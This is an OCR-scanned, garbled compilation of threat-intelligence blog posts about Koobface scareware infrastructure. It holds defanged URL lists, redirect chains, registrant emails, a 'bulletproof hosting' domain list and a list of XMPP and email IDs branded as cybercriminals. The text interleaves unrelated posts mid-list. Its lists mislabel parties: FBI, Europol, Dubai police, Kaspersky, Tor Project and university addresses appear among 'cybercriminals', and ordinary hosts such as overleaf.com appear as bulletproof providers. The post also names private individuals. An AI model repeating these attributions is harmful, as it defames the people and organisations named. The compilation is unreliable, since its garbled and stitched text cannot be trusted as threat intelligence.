DS Add ce remove programs 
GB Change a settings 


Other Places 
~< " t (c: ~< t . 
©Q My Network Places ww or \ ere 


i) My Documents DvD 
& Shared Doaznents 
GB control Panel ‘) noenbn te 
we 2 


Details 


COUT TTT rr) 
Now scanning: aactent.dil 


My Computer 
System Folder 


Windows Internet Explorer 


Harmful spyware or adware software. Sr OL Onr-lines scan should install Cyber Securty 
URiities to fic your pc. Please dick OK to download and install Cyber Securty tool. 


C«_ J 


Description: 
This program is potentially dangerous for your system. Trojan-Downloader stealing passwords, credit cards and other 
personal information from your computer. 


Advice: 
You need to remove this threat as soon as possible! 


For instance, the - now suspended - Koobface domain pancho-2807 .com is registered to 
Pancho Panchev, pancho.panchev@gmail.com, followed by rdr20090924 .info registered to 
Vancho Vanchev, vanchovanchev@mail.ru. As always, I’m totally flattered, and I’m still in a 
"stay tuned" mode for my very own branded scareware release - the Advanced Pro-Danchev 
Premium Live Mega Professional Anti-Spyware Online Cleaning Cyber Protection Scanner 
2010. 


It’s time to summarize some of the Koobface gang’s recent activities, establish a direct 
connection with the Bahama botnet, the [27]Ukrainian dating scam agency [28]Confidential 
Connections whose [29]botnet operations were linked to money-mule recruitment scams, 
with active domains part of their affiliate network parked at a Koobface-connected scareware 
serving domains, followed by the fact that they’re all responding to an IP involved in the 
ongoing U.S Federal Forms themed blackhat SEO campaign. It couldn’t get any uglier. 


i Cyber Security Installer 


This program will download and install Cyber 
§ Security on your PC. 


By clicking Continue button you accepting our 
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hxxp://bia2bestfile.persiangig.com/ 
hxxp://civilexp.persiangig.com/ 
hxxp://cybersaboteur.persiangig.com/ 
hxxp://dialup-download.persiangig.com/ 
hxxp://dl4-downloadfa.persiangig.com/ 
hxxp://downloadestan5.persiangig.com/ 
hxxp://e3mail.persiangig.com/ 


hxxp://ekrami0l.persiangig.com/ 
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hxxp://esmaeilpoor.persiangig.com/ 
hxxp://esshop.persiangig.com/ 
hxxp://faraz4u.persiangig.com/ 
hxxp://fatalking.persiangig.com/ 
hxxp://gOld-soft.persiangig.com/ 
hxxp://gha3dak.persiangig.com/ 
hxxp://gold-sOft.persiangig.com/ 
hxxp://gpod1.persiangig.com/ 
hxxp://nhamed-qcc.persiangig.com/ 
hxxp://nhamedanno.persiangig.com/ 
hxxp://namedweb.persiangig.com/ 
hxxp://hamix2x.persiangig.com/ 
hxxp://hotweb24.persiangig.com/ 
hxxp://hunterprogs.persiangig.com/ 
hxxp://impostor-76171.persiangig.com/ 
hxxp://iran30download.persiangig.com/ 
hxxp://iranmahsool.persiangig.com/ 
hxxp://jovss.persiangig.com/ 
hxxp://joker12.persiangig.com/ 
hxxp://kapakha3.persiangig.com/ 
hxxp://keylogger.persiangig.com/ 
hxxp://kiandew.persiangig.com/ 
hxxp://kifabi.persiangig.com/ 
hxxp://lord-pc.persiangig.com/ 
hxxp://mM1998.persiangig.com/ 
hxxp://mahdil0.persiangig.com/ 
hxxp://mammadcpu.persiangig.com/ 
hxxp://masterjoint.persiangig.com/ 
hxxp://mazaghine.persiangig.com/ 
hxxp://mehd1.persiangig.com/ 
hxxp://metal-baz.persiangig.com/ 
hxxp://mhm5000.persiangig.com/ 
hxxp://mrpayne.persiangig.com/ 
hxxp://narmafzar28.persiangig.com/ 
hxxp://net-work.persiangig.com/ 
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As of recently the gang has migrated to a triple-layer of legitimate infrastructure, consisting 
of bit.ly redirectors, leading to automatically registered Blogspot account which redirect to 
Koobface infected hosts serving the Koobface binary and the redirecting to a periodically 
updated scareware domain. Here are some of the domains involved. 


Ongoing campaing dynamically generating bit.ly URLs redirecting to automatically regis- 
tered Blogspot accounts, using the following URLs: 
bit.ly /VumFK -> drbryanferazzoli .blogspot.com 
bit.ly /IJcK3 -> toyetoyebalnaja .blogspot.com 

bit.ly /3mFyzs -> raimeishelkowitz .blogspot.com 
bit.ly /2wuSPj -> kelakelamccovery .blogspot.com 
bit.ly /2Pnn8l -> pattyedevero .blogspot.com 

bit.ly /2wuSPj -> kelakelamccovery .blogspot.com 
bit.ly /1HDmbm -> malinegainey-green. blogspot.com 
bit.ly /2xf5vB -> advaadvarukuni .blogspot.com 
bit.ly /3mFyzs -> raimeishelkowitz .blogspot.com 
bit.ly /2xf5vB -> advaadvarukuni .blogspot.com 
bit.ly /46pcCl -> paulangelogaetano .blogspot.com 
bit.ly /1HDmbm -> malinegainey-green .blogspot.com 
bit.ly /3JZSDD -> derieuwsdarrius .blogspot.com 
bit.ly /IJcK3 -> toyetoyebalnaja .blogspot.com 

bit.ly /2h7XRU -> shunnarahamandla .blogspot.com 
bit.ly /3JZsDD -> derieuwsdarrius .blogspot.com 
bit.ly /3Zj98G -> schubachmarquis .blogspot.com 
bit.ly /lsSXgRH -> nicnicmiralles .blogspot.com 

bit.ly /3eijza -> froneksaxxon .blogspot.com 

bit.ly /1I3rr7 -> attreechappy .blogspot.com 

bit.ly /2m3wP4 -> bilsboroughkebrom .blogspot.com 
bit.ly /30wcJn -> raheelanucci .blogspot.com 

bit.ly /2U7jYM -> orvelorvelblues .blogspot.com 
bit.ly /LCWOIZ -> kondrackinehemias .blogspot.com 
bit.ly /2m3wP4 -> bilsboroughkebrom .blogspot.com 
bit.ly /lqbXsi -> lizzamottymotty .blogspot.com 
bit.ly /79ONz -> rayvongonsalves .blogspot.com 
bit.ly /22Jyex -> klaartjebjorgvinsson .blogspot.com 
bit.ly /pO7jC -> humphriesteelateela .blogspot.com 
bit.ly /2IpZXx -> kalandraaleisha .blogspot.com 


The Blogspot accounts consist of a single post of automatically syndicated news item, 
which compared to previous campaign which relied on 25+ Koobface infected IPs directly 
embedded at Blogspot itself, this time relies on a single URL which attempts to connect to 
any of the Koobface infected IPS embedded on it. The currently active campaign redirects 
to rainbowlike cn/?pid=312s02 &sid=4db12f, which then redirects to [30]the scareware 
domain secure-your-files .com, with the sample phoning back to forbes-2009 .com/?b=1s1 
- 113.105.152.230, with another domain parked there activate-antivirus .com - Email: 
support@personal-solutions.com. 


Time to expose the entire portfolio of scareware domains pushed by the gang, and offer 
some historical OSINT data on their activities which were not publicly released until enough 
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hxxp://noktehaa.persiangig.com/ 
hxxp://onlykdk.persiangig.com/ 
hxxp://p30cloob.persiangig.com/ 
hxxp://persiantnt. persiangig.com/ 
hxxp://ramin-rock.persiangig.com/ 
hxxp://rexona-dl.persiangig.com/ 
hxxp://reza-eblicen.persiangig.com/ 
hxxp://rommy.persiangig.com/ 
hxxp://saman034.persiangig.com/ 
hxxp://satanic.persiangig.com/ 
hxxp://savitr.persiangig.com/ 
hxxp://sevdaboy.persiangig.com/ 
hxxp://shamal.persiangig.com/ 
hxxp://shansi-saghy.persiangig.com/ 
hxxp://spyftp.persiangig.com/ 
hxxp://tanhastrife.persiangig.com/ 
hxxp://upload-ekrami.persiangig.com/ 
hxxp://upload4u.persiangig.com/ 
hxxp://uploadh.persiangig.com/ 
hxxp://uploadr.persiangig.com/ 
hxxp://vobmahdi2009.persiangig.com/ 
hxxp://world-infotech.persiangig.com/ 
hxxp://wsoft. persiangig.com/ 
hxxp://xpl7a.persiangig.com/ 
hxxp://yahoohelper.persiangig.com/ 
hxxp://zebel-khan.persiangig.com/ 
hxxp://zeussoft.persiangig.com/ 
hxxp://zsoft.persiangig.com/ 
hxxp://alex1.persiangig.com/ 
hxxp://arashgaleri.persiangig.com/ 
hxxp://ardavanpc.persiangig.com/ 
hxxp://behraduk.persiangig.com/ 
hxxp://computerforensics.persiangig.com/ 
hxxp://computerplus.persiangig.com/ 
hxxp://dl1-security-network.persiangig.com/ 
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hxxp://echarge24.persiangig.com/ 
hxxp://ejavanmard.persiangig.com/ 
hxxp://elinamordadi.persiangig.com/ 
hxxp://esf-shop.persiangig.com/ 
hxxp://eshterak2.persiangig.com/ 
hxxp://groupsyahoo.persiangig.com/ 
hxxp://hfasanpc.persiangig.com/ 
hxxp://idrecover.persiangig.com/ 
hxxp://iran-haraj.persiangig.com/ 
hxxp://jaefari.persiangig.com/ 
hxxp://k-sazwari.persiangig.com/ 
hxxp://kabehentezar.persiangig.com/ 
hxxp://karara.persiangig.com/ 
hxxp://lartik.persiangig.com/ 
hxxp://mac-dl-com.persiangig.com/ 
hxxp://mahidown.persiangig.com/ 
hxxp://mansourlotfi.persiangig.com/ 
hxxp://mayanet.persiangig.com/ 
hxxp://mehdipendar.persiangig.com/ 
hxxp://noofoz.persiangig.com/ 
hxxp://panjsaher5.persiangig.com/ 
hxxp://pishgooyan.persiangig.com/ 
hxxp://riazi51.persiangig.com/ 
hxxp://saeedmaster.persiangig.com/ 
hxxp://sagheb.persiangig.com/ 
hxxp://shadmehrdj.persiangig.com/ 
hxxp://sheller2.persiangig.com/ 
hxxp://takahang.persiangig.com/ 
hxxp://alkanpc.persiangig.com/ 
hxxp://amirabar.persiangig.com/ 
hxxp://ao255.persiangig.com/ 
hxxp://arakmassage.persiangig.com/ 
hxxp://bb3h1.persiangig.com/ 
hxxp://darklordofthedestiny.persiangig.com/ 
hxxp://dl-p300n-2.persiangig.com/ 
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hxxp://e2ma3n.persiangig.com/ 
hxxp://eli22.persiangig.com/ 
hxxp://ervina.persiangig.com/ 
hxxp://farshidfallahi.persiangig.com/ 
hxxp://farzadnanejan.persiangig.com/ 
hxxp://files.persiangig.com/ 
hxxp://files1.persiangig.com/ 
hxxp://fishingteam.persiangig.com/ 
hxxp://freevlife.persiangig.com/ 
hxxp://goldon.persiangig.com/ 
hxxp://hspawn.persiangig.com/ 
hxxp://iii1992iii.persiangig.com/ 
hxxp://kiomarsss.persiangig.com/ 
hxxp://l-lacker.persiangig.com/ 
hxxp://lesolai.persiangig.com/ 
hxxp://liplipok.persiangig.com/ 
hxxp://mOriiii.persiangig.com/ 
hxxp://mOtrix.persiangig.com/ 
hxxp://magic4.persiangig.com/ 
hxxp://majidnezam.persiangig.com/ 
hxxp://mmv1991.persiangig.com/ 
hxxp://mojt3b3.persiangig.com/ 
hxxp://mormoroth.persiangig.com/ 
hxxp://nbc-ashiyane.persiangig.com/ 
hxxp://ncoder.persiangig.com/ 
hxxp://nethunter.persiangig.com/ 
hxxp://netqq.persiangig.com/ 
hxxp://nimakarimi.persiangig.com/ 
hxxp://omidplus.persiangig.com/ 
hxxp://pezhmanmax2002.persiangig.com/ 
hxxp://prOgrammers.persiangig.com/ 
hxxp://pzr23.persiangig.com/ 
hxxp://reign.persiangig.com/ 
hxxp://root3r-h3ll.persiangig.com/ 


hxxp://root3r.persiangig.com/ 
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hxxp://ruin3r-ashiyane.persiangig.com/ 
hxxp://saber-net. persiangig.com/ 
hxxp://saeed006.persiangig.com/ 
hxxp://sevom.persiangig.com/ 
hxxp://shabangahweb.persiangig.com/ 
hxxp://sina-serverl.persiangig.com/ 
hxxp://tntboy-001.persiangig.com/ 
hxxp://toopor-ir.persiangig.com/ 
hxxp://ven0o0s.persiangig.com/ 
hxxp://yahoo-bax.persiangig.com/ 
hxxp://air-siavash.persiangig.com/ 
hxxp://alibarzegar.persiangig.com/ 
hxxp://alimohajer.persiangig.com/ 
hxxp://arsalan100.persiangig.com/ 
hxxp://arshadguilan.persiangig.com/ 
hxxp://bossrasoul.persiangig.com/ 
hxxp://daramad14.persiangig.com/ 
hxxp://dinhac.persiangig.com/ 
hxxp://harrypotter722.persiangig.com/ 
hxxp://hh13570-sat.persiangig.com/ 
hxxp://karimzadeh.persiangig.com/ 
hxxp://kingofeagle.persiangig.com/ 
hxxp://metal200626.persiangig.com/ 
hxxp://miladgolnan.persiangig.com/ 
hxxp://milaneiran.persiangig.com/ 
hxxp://moejezat.persiangig.com/ 
hxxp://mr00798.persiangig.com/ 
hxxp://nn555.persiangig.com/ 
hxxp://p30base.persiangig.com/ 
hxxp://parsiblog.persiangig.com/ 
hxxp://playstation3.persiangig.com/ 
hxxp://shaji.persiangig.com/ 

Happy Technical Collection. 


1. https: //blogger . googleusercontent . com/img/b/R29vZ2x1/AVVXsEi1EiNb6K3r3B1cU1LIPNM6M-xRAgKs6vUbVj J8 jNMotxqia_ 
XPcUCJRBiFNNU27nUdg1iXLsxRcdzp8LId1- j 2cZhh8QpWIuHhH8v2- 
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19.8.4 A Compilation of Bulletproof Hosting Provider Domains (2023-08-13 10:27) 
[1] 


THIS DOMAIN HAS BEEN SEIZED 


by the Federal/Bureau of Investigation and Internal Revenue Service = Criminal Investigation 
es part of a coordinated law enforcement action taken against. 


The action has been taken in coordination with 
the United States Attorney's Office for the Middle District of Florida and 
the Computer Crime and Intellectual Property Section of the Department of Justice 
with substantial assistance provided by Prokuratura Regionalna w Katowicach 
and Centralne Biuro Zwalczania Cyberprzestepczosci Zarzad w Krakowie_ 


In need of a fresh and relevant bulletproof hosting provider domain list for research purposes? 


Check out the following list of domains which | compiled today and decided to share with 
everyone reading my blog. 


Sample bulletproof hosting provider domains include: 


hxxp://1984hosting.com 
hxxp://2X4.ru 
hxxp://2sync.co 
hxxp://3nt.com 
hxxp://NovoGara.com 
hxxp://abusehosting.ru 
hxxp://admintek.net 
hxxp://advania.com 
hxxp://afranet.com 
hxxp://agava.ru 
hxxp://albahost.net 
hxxp://alexhost.com 
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hxxp://altushost.com 
hxxp://anders.ru 
hxxp://anonymoushosting.in 
hxxp://antiddos. biz 
hxxp://area6.ru 
hxxp://artmotion.eu 
hxxp://asiapacific-it.com 
hxxp://asiapacifichosting.com 
hxxp://atlax.com 
hxxp://availo.se 
hxxp://avk-com.ru 
hxxp://bacloud.com 
hxxp://bahnhof.net 
hxxp://balkanvps.com 
hxxp://beotel.net 
hxxp://berihoster.ru 
hxxp://besthosting.ua 
hxxp://blazingfast.io 
hxxp://blueangelhost.com 
hxxp://borneo.kg 
hxxp://bulletproof-web.ru 
hxxp://bullhost.co 
hxxp://ccihosting.com 
hxxp://cinipac.com 
hxxp://citynethost.com 
hxxp://cloud.volia.com 
hxxp://cloudlite.ru 
hxxp://colocall.net 
hxxp://comsats.net.pk 
hxxp://continent8.com 
hxxp://crservers.com 
hxxp://ctyun.cn 
hxxp://cubexsweatherly.com 
hxxp://curacaowebhosting.com 


hxxp://cyberbunker.com 
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hxxp://cyberfuel.com 
hxxp://datacenter.ir 
hxxp://datahouse.ru 
hxxp://dataplugs.com 
hxxp://dedicado.com.uy 
hxxp://deltahost.com 
hxxp://deltalis.com 
hxxp://deltasystem.cl 
hxxp://dis.telecom.kz 
hxxp://dmzhost.c 
hxxp://doclerweb.com 
hxxp://dreamwebhosting.net 
hxxp://ecatel.co.uk 
hxxp://eccsolutions.net 
hxxp://ecodissident.net 
hxxp://ekvia.com 
hxxp://elkupi.com 
hxxp://elvsoft.com 
hxxp://en.datasource.ch 
hxxp://en.hostsolutions.ro 
hxxp://en.ukrtelecom.ua 
hxxp://en.uplink.hu 
hxxp://eng.deninet.net 
hxxp://eodatacenter.com 
hxxp://eranet.com 
hxxp://eserver.ru 
hxxp://evoluso.com 
hxxp://exmasters.com 
hxxp://fastvds.ru 
hxxp://finalhosting.cz 
hxxp://firstbyte.ru 
hxxp://firstvds.ru 
hxxp://flokinet.is 
hxxp://freehost.com.ua 


hxxp://galkahost.com 
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hxxp://geekhost.pro 
hxxp://gemenii.ro 
hxxp://glesys.com 
hxxp://global.ba 
hxxp://globatel.org 
hxxp://gmhost.hosting 
hxxp://goodnet.com.ua 
hxxp://grandhost.cc 
hxxp://habangnet.com 
hxxp://hc.ru 
hxxp://heberjahiz.com 
hxxp://hidemyhost.com 
hxxp://hktechnology.com 
hxxp://host.al 
hxxp://hostalot.ru 
hxxp://hoster.ru 
hxxp://hosthink.net 
hxxp://hosting.nic.ru 
hxxp://hosting.reg.com 
hxxp://hosting.tel.ru 
hxxp://hosting.tongacable.net 
hxxp://hosting.turk.net 
hxxp://hosting.ua 
hxxp://hostingserve.rs 
hxxp://hostkey.com 
hxxp://hostname.cl 
hxxp://hostoweb.com 
hxxp://hostparatuvida.com 
hxxp://hostsailor.com 
hxxp://hts.ru 
hxxp://hub.org 
hxxp://icyevolution.com 
hxxp://idhost.kz 
hxxp://inc.ru 
hxxp://ihor.ru 
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hxxp://infiumhost.com 
hxxp://infobox.ru 
hxxp://infomaniak.ch 
hxxp://innovahosting.net 
hxxp://insacom.cl 
hxxp://internetport.com 
hxxp://internetsolutions.hk 
hxxp://iprosrv.com 
hxxp://ironservers.cl 
hxxp://ispcompania.com 
hxxp://ispserver.com 
hxxp://ititch.com 
hxxp://itldc.com 
hxxp://itools.mn 
hxxp://ixam-hosting.com 
hxxp://justhost.in.ua 
hxxp://katzglobal.com 
hxxp://knownsrv.com 
hxxp://koddos.com 
hxxp://kowloonhosting.com 
hxxp://kras.host 
hxxp://kriweb.com 
hxxp://laceibanetsociety.com 
hxxp://lankapartnerhost.com 
hxxp://latinoserver.com 
hxxp://Ifait.com 
hxxp://libertyvps.net 
hxxp://libyanspider.com 
hxxp://licosys.com 
hxxp://linkdatacenter.net 
hxxp://localhost.tn 
hxxp://lolekhosted.net 
hxxp://Itt.ly 
hxxp://lunarvps.com 


hxxp://lunarvps.comorangewebsite.com 
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hxxp://m247.roen 
hxxp://magicnet.md 
hxxp://masterhost.ru 
hxxp://mcloud.rs 
hxxp://melbicom.net 
hxxp://memvds.ru 
hxxp://mikrovps.com 
hxxp://mirohost.net 
hxxp://mtel.ba 
hxxp://mycloud.by 
hxxp://nashirnet.net 
hxxp://natro.com 
hxxp://neoserver.ru 
hxxp://netassist.ua 
hxxp://netbrella.net 
hxxp://netengi.com 
hxxp://netplace.ru 
hxxp://networksdelmanana.com 
hxxp://nexlinx.net.pk 
hxxp://nexus.pk 
hxxp://nidahost.com 
hxxp://nine.ch 
hxxp://ninet.rs 
hxxp://nonamehosts.com 
hxxp://nplusone.ma 
hxxp://nsc.ba 
hxxp://oblaci.rs 
hxxp://offshorededi.com 
hxxp://offshoreracks.com 
hxxp://ohp.ua 
hxxp://ok.is 
hxxp://online.tm 
hxxp://orangewebsite.com 
hxxp://ouriran.com 
hxxp://overleaf.com 
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connections between multiple campaigns were established.Which ISPs are currently offering 
hosting services for the scareware domains portfolio [31]pushed by the [32]Koobface gang? 
The current portfolio is parked at [33]206.217.201.245 (AS36351 [34]SOFTLAYER Technologies 
Inc. surprise, surprise!); [35]212.117.174.19 (AS44042 ROOT eSolutions surprise, surprise 
part two) and at [36]91.212.226.155 (AS44042 [37]ROOT eSolutions). 


Scareware redirectors parked at 91.213.126.102: 

rainbowlike .cn - Email: HuiYingTsui@airways.au 
authorized-payments .com - Email: degrysemario@googlemail.com 
poltergeist2000 .cn - Email: nfrank@flamcon.com.cn 

sestiad2 .cn - Email: PietroToscani@celli.it 

uninformed2 .cn - Email: PietroToscani@celli.it 
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hxxp://pachosting.hk 
hxxp://panamaserver.com 
hxxp://parsonline.com 
hxxp://parspack.com 
hxxp://pavietnam.vn 
hxxp://pin.se 
hxxp://pirateshosting.net 
hxxp://planetahost.ru 
hxxp://plus.hr 
hxxp://pndc.ir 
hxxp://portlane.com 
hxxp://powerhost.cl 
hxxp://privatelayer.com 
hxxp://pro-managed.com 
hxxp://proen.co 
hxxp://proen.co.CARDING FORUM 
hxxp://proen.co.th 
hxxp://profivps.hu 
hxxp://prq.se 
hxxp://ps.kz 
hxxp://ptclcloud.com.pk 
hxxp://pttrs.net 
hxxp://pw-service.com 
hxxp://qsscloud.ba 
hxxp://rackend.com 
hxxp://racklodge.com 
hxxp://racknation.cr 
hxxp://radore.com 
hxxp://rapidcompute.com 
hxxp://rayadatacenter.com 
hxxp://renter.ru 
hxxp://rockhoster.com 
hxxp://ru-tld.ruen 
hxxp://rusonyx.ru 


hxxp://rx-name.ua 
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hxxp://sadecehosting.com 
hxxp://securehost.com 
hxxp://selectel.com 
hxxp://semele.com.tr 
hxxp://seohosting.com.tr 
hxxp://server.ua 
hxxp://serverastra.com 
hxxp://serverhk.org 
hxxp://serverhosting.my 
hxxp://serveria.com 
hxxp://servidores.gamerlive.cl 
hxxp://shinjiru.com 
hxxp://simplecloud.ru 
hxxp://sinohosting.net 
hxxp://smart-hosting.ro 
hxxp://solarcom.ch 
hxxp://sologigabit.com 
hxxp://space.kz 
hxxp://starrydns.net 
hxxp://sunnyvision.com 
hxxp://superhosting.net 
hxxp://swedehost.net 
hxxp://swedendedicated.com 
hxxp://synwebhost.org 
hxxp://syt.com 
hxxp://t4.cr 
hxxp://takewyn.com 
hxxp://tchile.com 
hxxp://tehnodom.com 
hxxp://tele-asia.net 
hxxp://teleklik.ba 
hxxp://thnic.co 
hxxp://thnic.co. CARDING FORUM 
hxxp://thnic.co.th 
hxxp://thost.ru 
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hxxp://tilaa.com 
hxxp://time4vps.eu 
hxxp://timeweb.com 
hxxp://tomtel.ru 
hxxp://tophost.mden 
hxxp://trabia.com 
hxxp://trvps.net 
hxxp://tucha.ua 
hxxp://uanode.net 
hxxp://uar.net 
hxxp://udasha.com 
hxxp://ukraine.com.ua 
hxxp://ukrdc.net 
hxxp://ukrnames.com 
hxxp://ultratechhost.com 
hxxp://underhost.com 
hxxp://unit-is.com 
hxxp://uniteddc.net.ua 
hxxp://urdn.com.ua 
hxxp://valuehost.ru 
hxxp://vds64.com 
hxxp://vdsinside.com 
hxxp://vhoster.net 
hxxp://victoriagroup.me 
hxxp://vinahost.vn 
hxxp://vinastar.net 
hxxp://virtono.com 
hxxp://virtualpark.hu 
hxxp://vit.com.tr 
hxxp://voxility.com 
hxxp://vps.ag 
hxxp://vpsbg.eu 
hxxp://vpsgod.com 
hxxp://vscale.io 


hxxp://vstoike.ru 
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hxxp://warez-host.com 
hxxp://wavecom.ee 
hxxp://web-server.eu 
hxxp://webcare360.com 
hxxp://webhost.tn 
hxxp://webonic.hu 
hxxp://webservices.dz 
hxxp://webuzo.net 
hxxp://weservit.nl 
hxxp://wrzhost.com 
hxxp://xenyohosting.com 
hxxp://xeonbd.com 
hxxp://xethost.com 
hxxp://xhostfire.com 
hxxp://xservers.ro 
hxxp://yourserver.se 
hxxp://zgh.cl 
hxxp://zomro.com 


Happy hunting. 


1. https://blogger . googleusercontent .com/img/b/R29vZ2x1/AVVXsEh1M1zU23GyZuuaYyR-51Kegn-MZule8£UJIdQs7pJelfAq 
980sof6kvX0aBqHUL7V-zg0AeGB1s9P6a50_GLOSKUbVIKp0_ 40440 


19.8.5 Exposing a Currently Active Personally Identifiable Cybercriminals 


XMPP/Jabber Account IDs Portfolio (2023-08-20 20:37) 


[1] 
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<parent> Darkmoney iHonker ShadowMarket 


11Wang DarkWeb LinkFeed SkyFraud 
365Exe DomenForum Linuxac.org Spyhackerz 
419eater Eviloctal Master-X Svuit.vn 
4HatDay Exelab MasterWebs Szenebox 
aHack Forum-UINSell MaulTalk Szuwi 
Aljyyosh Forum.Zloy_bz Mmpg.ru Tenebris 
Antichat.ru ForumSape = Mr11-11mr.7olm.org TheBot 
ArmadaBoard ForumSEO Nullnoss.org Toolbabase.se 
BigFozzy Free-hack pay-per-install_org TotalBlackhat 
BlackhatWorld ghostmarket.net PhreakerPro Turkhackteam 
BPCForum Gla.vn Piratebuhta.pw Vsehobby 
Cardvilla GoFuckBiz ProCrd Webmasters.ru 
Chf gofuckbiz.com ProLogic Whitehat.vn 
CNHonker H4kurd.com Promarket WW/H-Club 
CNSec Hack-Port ProxyBase www.opensc.ws 
Crack-Forum Hackersoft scamwarners Xakep.bg 
Cracked.to Hackingboard SEOCafe Xakepok 
Cyberizm Hackings SEOForum Zismo 
Darkmarket.la iFud 


Folks, 


I’ve been recently digging deep into the ever evolving cybercrime ecosystem doing research 
and trying to supply as much personally identifiable information on the bad guys in the form of 
personally identifiable email address accounts including XMPP/Jabber account IDs where the 
ultimate goal would be to properly assist everyone on their way to properly do their research 
including the U.S Intelligence Community and U.S Law Enforcement on its way to properly 
track down and monitor the individuals behind these campaigns. 


In this post I'll share with everyone a recently processed portfolio of personally identifiable 
XMPP/Jabber account IDs with the idea to assist everyone on their way to properly do their 
research including to assist the U.S Intelligence Community and U.S Law Enforcement on its 
way to properly track down and monitor these individuals. 


Happy research. 
Sample personally identifiable cybercriminals XMPP/Jabber account IDs include: 
fastchk@dlab.im 
fastchk@dukgo.com 
fastchk@xmpp.su 
seotest@swissjabber.ch 
coding@xmpp.jp 
j _sparrow@business.cc 
ksx@jabber.dk 
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egeg@Onlline.at 
support@1vpns.com 
firstvpn@jabber.cz 
synack@xjabber.org 
jedecapua@fbi.gov 
mvanderbunt@fbi.gov 
Alexander.Gutwin@europol.europa.eu 
Catarina.Nunes-Ladeira@europol.europa.eu 
aalmarri@dubaipolice.gov.ae 
k.alhosani@dubaipolice.gov.ae 
dosx@exploit.im 
cityofgod@exploit.im 
synack@sj.ms 

ia@exploit.im 
topdos@verified.pm 
moviestar@jabber.de 
looklingtobuy@xmpp.jp 
dr32@exploit.im 
aril00krat@jabber.mipt.ru 
markus123@jabber.cz 
vetman3@blah.im 
marquis@wiuwiu.de 
bOrman@xmpp.jp 
synack@dlab.im 
synack2@dukgo.com 
synack@xmpp.su 
topdos@xmpp.jp 
maestro@jabber.at 
chopin@exploit.im 
chop@none.su 
web47@xabber.de 
m4doff@sj.ms 
asuwant@exploit.im 
asuwant@jabber.ccc.de 


dibua@thesecure. biz 
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sales@vip-support.org 
support@vip-support.org 
starik@thesecure. biz 
valek.dennikov@gmail.com 
fizot@mail.ru 
xtexcounter@bk.ru 
wm.lancelot@gmail.com 
maravanio@gmail.com 
mserver@mail.ru 
game@gameprom.com 
ahmed _yurlanov1988@protonmail.com 
kurganlab@mail.ru 
koska@jabber.ccc.de 
polobandit@xmpp.jp 
supahelp@jaim.at 
finedumps.com@exploit.im 
trackz@mpro.la 
trackz@pkey.in 
dpp@exploit.im 
d4s@jabber.fr 
roxas@swissjabber.ch 
planet9@sj.ms 
g3mz@exploit.im 
A.M.1.G.0.S@exploit.im 
p-x@hacker.im 
wermonter@neko.im 
hitro@roteshield.ru 
jasha@zauris.ru 
onkelzzz@pandion.im 
none _1@xmpp.jp 
asuwant@mfclub.ws 
prof777@xmpp.jp 
no.like.other@jabber.cd 
qir@codingteam.net 


greystone@jabber.cn 
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success@xmpp.pro 
acsyS@xmpp.jp 
shopbuyshop@sj.ms 
ps2k20@jabber.ru 
swarmshop@verified.pm 
bcd@europe.com 
worldofproxy@inbox.ru 
steryk@mail.ru 
flycracker@jabba.in 
serg@kaddafi.me 
sandman@jab.im 
keeloq@crypto.rub.de 
platplus@tormail.net 
bridges@torproject.org 
phantominfo@xanon.net 
soupnazi@efnet.ru 
i.am@padonaque.info 
Leroy2004@mail.ru 

Kup _land@mail.ru 
mater.gang@jabba.biz 
pro.stuffer@exploit.im 
exroot@exploit.im 
night.walker@xmpp.jp 
master.zu@mfclub.ws 
master.zu@exploit.im 
aventus@jabba.biz 
aventus@xmpp.jp 
epicman@thesecure. biz 
fingerlink@exploit.im 
well.good@thesecure.biz 
pete777@mail.ru 
cps@calgarypolice.ca 
desertmack@mailvault.com 
chinabigl1@gmail.com 
Gangass@exploit.im 
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gangass@jabber.at 
kjlj@adjdjjg.com 
fidel_orders@yahoo.com 
kk@prozvon.us 
rdm-yandex@nnm.ru 
plgs@xmpp.jp 
viking@OnlLne.at 
888300@exploit.im 
vvMvv@exploit.im 
kkk@jid.pl 
bruj@jabber.minus273.org 
support@1jabber.com 
admin@1jabber.com 
pferguson@cizmicconsulting.com 
2002@chatme.im 

negro _albino@jabber.ru 
golden _triangle@xmpp.jp 
masonhppy@gmail.com 
universe@sj.ms 
dds@xmpp.jp 
d02@xmpp.jp 
consilium@sj.ms 
forename.lastname@cl.cam.ac.uk 
ika@jabber.cx 
elcondor@thesecure.biz 
scans@voOid.cc 
garry.wu@safe-mail.net 
0121@sj.ms 
stas_vi@mail.ru 
s3x@neko.im 
rubensamvelich@yahoo.com 
boookscafe@yahoo.com 
you@yourmail.com 
Server2009@SMB3.local 
Beny.Krick@jabber.in 
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dsp559@hotmail.com 
andres555@rambler.ru 
vrublevsky@chronopay.com 
p.vrublevsky@chronopay.com 
red@mail-eye.com 
myusername@mywebsite.com 
mnsclec@gmail.com 
mick@sensorynetworks.com 
icq _uin@gip.ru 
info@kaspersky.com 
forum@kaspersky.com 
webmaster@kaspersky.com 
icamis@carderplanet.cc 
contact@privacyprotect.org 
tiny@webmoney.ru 
admin@gmail.com 
support@igatele.com.tw 
kevinchu@igatele.com.tw 
service@xinonet.cn 
support@echonet.tw 
noc@cexlink.cn 
wang@xterra.tw 
tsai@isInet.cn 
noc@twinnet.tw 
no.valid.email@worldnic.com 
chan@twinnet.tw 
lee.eric@echonet.tw 
d0a9bd362531bfc787826bfe5fb75b47 @todaynic.biz 
j.yang@cexlink.cn 
kim@xinonet.cn 
plastics@webmoney.ru 
val@carderplanet.cc 
qip@carderplanet.cc 
kk@carderplanet.cc 
tt@carderplanet.cc 
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retrocession2 .cn - Email: PietroToscani@celli.it 
unimpressible3 .cn - Email: Pietroloscani@celli.it 
uncrown3 .cn - Email: PietroToscani@celli.it 
sneak-peak .cn - Email: info@Milwaukee911.com 
cellostuck .cn - Email: info@Milwaukee911.com 
stinkingthink .cn - Email: nfrank@flamcon.com.cn 
skewercall .cn - Email: HuiYingTsui@airways.au 
be-spoken .cn - Email: info@Milwaukee911.com 
transmitteron .cn - Email: nfrank@flamcon.com.cn 
kangaroocar .cn - Email: HuiYingTsui@airways.au 
pericallis .cn - Email: HuiYingTsui@airways.au 
exponentials .cn - Email: info@Milwaukee911.com 
triforms .cn - Email: info@Milwaukee911.com 
outperformoly .cn - Email: nfrank@flamcon.com.cn 
genusbiz .cn - Email: HuiYingTSui@airways.au 


Scareware domains parked at 206.217.201.245; 212.117.174.19 and 91.212.226.155: 
anti-malware-scan-for-you .com - Email: information@brunter.sw 
available-scanner .com - Email: m.smith@Recruiters.com 
bewareofspyware .com - Email: m.smith@Recruiters.com 
